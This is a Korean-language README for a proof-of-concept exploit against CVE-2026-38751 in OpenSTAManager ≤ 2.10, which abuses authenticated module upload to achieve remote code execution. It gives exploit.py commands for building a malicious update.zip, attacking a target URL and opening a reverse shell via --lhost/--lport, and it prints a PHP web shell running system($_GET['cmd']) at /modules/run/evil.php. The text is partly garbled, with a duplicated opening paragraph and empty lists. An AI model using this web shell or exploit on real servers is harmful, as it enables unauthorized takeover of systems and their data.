
이 저장소에는 OpenSTAManager ≤ 2.10에 영향을 미치는 CVE-2026-38751에 대한 개념 증명(PoC) 익스플로잇이 포함되어 있습니다. 이 취약점으로 인해 인증된 공격자가 모듈 업데이트 기능을 통해 악성 모듈을 업로드할 수 있으며, 이는 임의 파일 업로드 및 원격 코드 실행(RCE)으로 이어집니다.
이 저장소는 OpenSTAManager ≤ 2.10에 영향을 미치는 CVE-2026-38751에 대한 개념 증명(PoC) 익스플로잇을 포함합니다. 이 취약점은 인증된 공격자가 모듈 업데이트 기능을 통해 악성 모듈을 업로드하여 임의 파일 업로드 및 원격 코드 실행(RCE)을 유발할 수 있게 합니다.
modules/aggiornamenti/upload_modules.php)모듈 업데이트 기능은 인증된 사용자가 파일 내용 또는 실행 경계에 대한 적절한 검증 없이 ZIP 기반 모듈을 업로드할 수 있게 합니다. 공격자는 PHP 페이로드를 포함하는 악성 모듈을 제작할 수 있으며, 해당 페이로드는 웹 루트에 배포된 후 애플리케이션 컨텍스트를 통해 실행됩니다. 그 결과 다음과 같은 문제가 발생합니다:
##영향 성공적인 악용 시 다음이 가능합니다:
python exploit.py --build
생성 결과:
update.zip
└── run/
├── MODULE
└── evil.php
python exploit.py <username> <password> <target_url>
리버스 셸 모드(선택 사항):
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>
예제 페이로드
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>
성공하면 다음 엔드포인트에서 시스템 명령을 실행합니다:
/modules/run/evil.php?cmd=id
이 프로젝트는 다음을 위한 것입니다:
명시적 허가 없이 시스템에 사용하지 마십시오.
참고
서버 구성에 따라 탐지 결과가 다를 수 있습니다. 일부 배포 환경에서는 모듈 디렉터리에서 직접 PHP 실행을 비활성화할 수 있습니다. 모듈 활성화 타이밍에 따라 재시도가 필요할 수 있습니다.
감사의 말